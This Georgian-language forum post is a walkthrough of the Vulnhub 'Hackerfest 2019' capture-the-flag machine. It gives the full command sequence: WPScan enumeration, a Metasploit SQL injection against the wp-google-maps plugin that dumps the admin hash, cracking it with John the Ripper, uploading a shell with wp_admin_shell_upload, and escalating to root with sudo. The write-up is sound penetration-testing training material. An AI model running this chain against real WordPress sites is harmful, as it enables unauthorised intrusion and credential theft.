მოგესალმებათ CYBSECGROUP ფორუმი
№1 კიბერ ფორუმი საქართველოში, თქვენ გაქვთ შესაძლებლობა გაეცნოთ საინტერესო პროექტებს, საინტერესო გარემოში
რეგისტრაცია

Hackerfest 2019 : Vulnhub Pentest CTF

Z3R0

Hacktivist 🌐
ადმინისტრაცია
ადმინისტრატორი
აგვ 9, 2018
102
169
Hell ·
#1
გამარჯობა მეგობრებო, დიდიხანია აღარაფერი დამიწერია და ვიფიქრე ისევ Vulnhub სავარჯიშოს განვიხილავთქო... მოკლედ დღევანდელ სავარჯიშოს ჰქვია Hackerfest, ჰაკერფესტი არის ივენთი რომელიც ტარდება ყოველწლიურად და წელს გამოტანილი იყო ეს CTF დავალება

მანქანის გადმოწერა შეგიძლიათ აქედან : CYBSECGROUP

ჩავრთოთ მანქანა და დავიწყოთ მისი ქსელში აღმოჩენით Angry IP-ის გამოყენებით
IP -ს აღმოჩენის შემდეგ შევიდეთ ამ აიპი მისამართზე (ჩემს შემთხვევაში აიპი იყო : 192.168.50.185)

აიპი მისამართზე გვხვდება Wordpress საიტი, დავიწყოთ ენუმერაცია WPScan -ის საშუალებით

სკანირების რეზულტატი გამოიყურება შემდეგნაირად:


┌─[root@parrot]─[/home/z3r0/Downloads]
└──╼ #wpscan --enumerate u,p --url http://192.168.50.185
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.50.185/
[+] Started: Thu Oct 31 05:42:39 2019

Interesting Finding(s):

[+] http://192.168.50.185/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.50.185/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.50.185/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.50.185/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.50.185/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.50.185/?feed=rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.50.185/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.50.185/wp-content/themes/twentyseventeen/
| Latest Version: 2.2 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.50.185/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3, Match: 'Version: 2.2'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-google-maps
| Location: http://192.168.50.185/wp-content/plugins/wp-google-maps/
| Last Updated: 2019-10-25T13:36:00.000Z
| [!] The version is out of date, the latest version is 8.0.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
| Fixed in: 7.10.43
| References:
| - https://wpvulndb.com/vulnerabilities/9243
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9912
| - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
| - https://lists.openwall.net/full-disclosure/2019/02/05/13
|
| [!] Title: WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
| Fixed in: 7.11.18
| References:
| - https://wpvulndb.com/vulnerabilities/9249
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
| - https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php
|
| [!] Title: WP Google Maps <= 7.11.27 - Admin Settings CSRF
| Fixed in: 7.11.28
| References:
| - https://wpvulndb.com/vulnerabilities/9332
| - https://plugins.trac.wordpress.org/changeset/2099647/wp-google-maps/trunk/legacy-core.php?old=2092302&old_path=wp-google-maps%2Ftrunk%2Flegacy-core.php
|
| [!] Title: WP Google Maps <= 7.11.34 - CSRF to Stored XSS
| Fixed in: 7.11.35
| References:
| - https://wpvulndb.com/vulnerabilities/9442
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14792
| - https://plugins.trac.wordpress.org/changeset/2119722
|
| Version: 7.10.02 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.50.185/wp-content/plugins/wp-google-maps/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] webmaster
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)


[+] Finished: Thu Oct 31 05:42:45 2019
[+] Requests Done: 72
[+] Cached Requests: 7
[+] Data Sent: 14.607 KB
[+] Data Received: 26.185 MB
[+] Memory used: 212.352 MB
[+] Elapsed time: 00:00:05



როგორც ხედავთ პლაგინს wp-google-maps გააჩნია SQL ინექცია, რომელიც შეგვიძია გამოვიყენოთ, ასევე ენუმერაციამ მოგვცა საშუალება დაგვედგინია მომხმარებლის იუზერნეიმი webmaster

ამ ინექციის ექპლოიტი შეგვიძლია ვიპოვნოთ metasploit framework-ში

Code:
┌─[root@parrot]─[/home/z3r0/Downloads]
└──╼ #msfconsole

msf5 > use auxiliary/admin/http/wp_google_maps_sqli 
msf5 auxiliary(admin/http/wp_google_maps_sqli) > show options

Module options (auxiliary/admin/http/wp_google_maps_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DB_PREFIX  wp_              yes       WordPress table prefix
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 auxiliary(admin/http/wp_google_maps_sqli) > run
[*] Running module against 192.168.50.185

[*] 192.168.50.185:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191031062337_default_192.168.50.185_wp_google_maps.j_401116.bin
[+] 192.168.50.185:80 - FoundX webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exit
ჩვენ შევძელით იუზერის პაროლის ამოღება ($P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1) , და ვცადოთ მისი გაშიფვრა

მე გამოვიყენებ johntheripper-ს და ყველა პოპულარულ ვოდლისტს rockyou.txt

ჩავწეროთ ჰეში ტექსტურ ფაილში და გავუშვათ შემდეგი კომანდი
Code:
┌─[z3r0@parrot]─[~/Desktop]
└──╼ $john --wordlist=./rockyou.txt hash.txt
პაროლი იყო : kittykat1

პაროლის გამოყენებით ჩვენ შეგვიძლია გავხსნათ შელი ისევ msf-ს გამოყენებით

Code:
msf5 > use exploit/unix/webapp/wp_admin_shell_upload 
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster
username => webmaster
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1
password => kittykat1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
დავაიმპორტოთ ტერმინალი და გადავიდეთ ვებმასტერის იუზერზე

Code:
meterpreter > shell
Process 5440 created.
Channel 2 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
su webmaster
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

www-data@HF2019-Linux:$ su webmaster
su webmaster
Password: kittykat1

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
webmaster@HF2019-Linux:$
სერვერზე webmaster-ის იუზერს სუდოს ნებისმიერ ბრძანებაზე აქვს უფლება ამიტომაც პრივილეგიების ესკალაცია არაა საჭირო
გავსხნათ რუთის შელი
Code:
webmaster@HF2019-Linux:$ sudo -s
sudo -s
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@HF2019-Linux:.# cd /root
cd /root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@HF2019-Linux:~# ls
ls
flag.txt
root@HF2019-Linux:~# cat flag.txt
cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
root@HF2019-Linux:~#
სულ ეს იყო, გისურვებთ წარმატებას!
 
მოწონებები: W0RLD3ND3R, Zgarbu and Dimitri Khetaguri